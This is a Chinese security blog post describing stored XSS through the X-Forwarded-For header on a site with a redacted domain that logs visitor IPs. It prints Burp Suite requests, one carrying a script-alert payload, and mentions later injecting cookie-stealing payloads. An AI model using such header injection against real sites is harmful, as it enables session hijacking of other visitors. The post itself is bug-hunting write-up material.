一次有趣的X-Forwarded-For头存储XSS

admin 2021年12月2日11:55:08安全文章评论31 views1218字阅读4分3秒阅读模式


一次有趣的X-Forwarded-For头存储XSS

首先是一个这个网站:

https://io.xxx.cn/iper/ips.html


一次有趣的X-Forwarded-For头存储XSS

只要你访问了这个URL:

https://io.xxx.cn/iper/



一次有趣的X-Forwarded-For头存储XSS

然后就会记录你的IP:


一次有趣的X-Forwarded-For头存储XSS

那么如果吧IP修改为XssPayload会不会触发XSS跨站脚本攻击呢?

先是下载了这个修改IP的插件:X-Forwarded-For Header

需要科学上网才能使用哦!


一次有趣的X-Forwarded-For头存储XSS


我显示吧IP修改为内网IP然后通过BurpSuite抓包:


一次有趣的X-Forwarded-For头存储XSS


GET /iper/ HTTP/1.1
Host: io.xxx.cn
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Forwarded-For: 192.168.1.2
Accept-Language: zh-CN,zh;q=0.9


吧X-Forwarded-For: 192.168.1.2修改为:X-Forwarded-For: "/><script>alert('Power_liu')</script>script>:


一次有趣的X-Forwarded-For头存储XSS

GET /iper/ HTTP/1.1
Host: io.xxx.cn
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Forwarded-For: "/><script>alert('Power_liu')</script>script>
Accept-Language: zh-CN,zh;q=0.9


一次有趣的X-Forwarded-For头存储XSS

这样就成功触发XSS-Payload弹窗!还是挺有趣的,以后挖洞的时候可以利用这一点来插入PayloadCookie!


一次有趣的X-Forwarded-For头存储XSS



本文始发于微信公众号(疯猫网络):一次有趣的X-Forwarded-For头存储XSS

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月2日11:55:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一次有趣的X-Forwarded-For头存储XSS http://cn-sec.com/archives/508851.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: